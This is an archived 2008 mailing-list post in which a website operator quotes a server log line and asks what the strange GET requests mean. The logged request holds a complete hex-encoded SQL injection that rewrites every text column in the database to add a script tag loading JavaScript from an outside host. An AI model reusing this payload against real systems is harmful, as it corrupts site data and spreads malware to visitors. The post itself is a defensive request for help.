W3C home > Mailing lists > Public > semantic-web@w3.org > August 2008

Commands Sent to an FeaReferenceModelOntology

From: Adrian Walker <adriandwalker@gmail.com>
Date: Fri, 15 Aug 2008 13:42:12 -0400
Message-ID: <1e89d6a40808151042s1218466ua66417ad160466fb@mail.gmail.com>
To: semantic_web@googlegroups.com, SW-forum <semantic-web@w3.org>, semanticweb@yahoogroups.com, "[ontolog-forum]" <ontolog-forum@ontolog.cim3.net>
Hi All --

Your expert advice please.

On our website [1], we support a kind of Wiki for business rules and facts,
written in executable English.

The site can also be used as an SOA endpoint.

One of the sets of rules and facts on the site is a version of the
FeaReferenceModelOntology.

We are seeing incoming GET commands like the one listed below.

 [15/Aug/2008:13:10:57 -0400] "GET
/demo_agents/FeaReferenceModelOntology2.agent?;DeCLARE%20@S
%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));ExEC(@S);
HTTP/1.1" 200 620290

The commands originate from many different sites around the internet, and we
have not been able to find out why they are being sent.

Does anyone know please what these commands are trying to do?  Or are they
simply buffer overflow attack attempts?

Thanks for your kind thoughts about this, and apologies for cross posting.

                                                   -- Adrian

[1]  Internet Business Logic
A Wiki and SOA Endpoint for Executable Open Vocabulary English over SQL and
RDF
Online at www.reengineeringllc.com    Shared use is free

Adrian Walker
Reengineering
Received on Friday, 15 August 2008 17:42:49 GMT

This archive was generated by hypermail 2.3.1 : Tuesday, 26 March 2013 21:45:24 GMT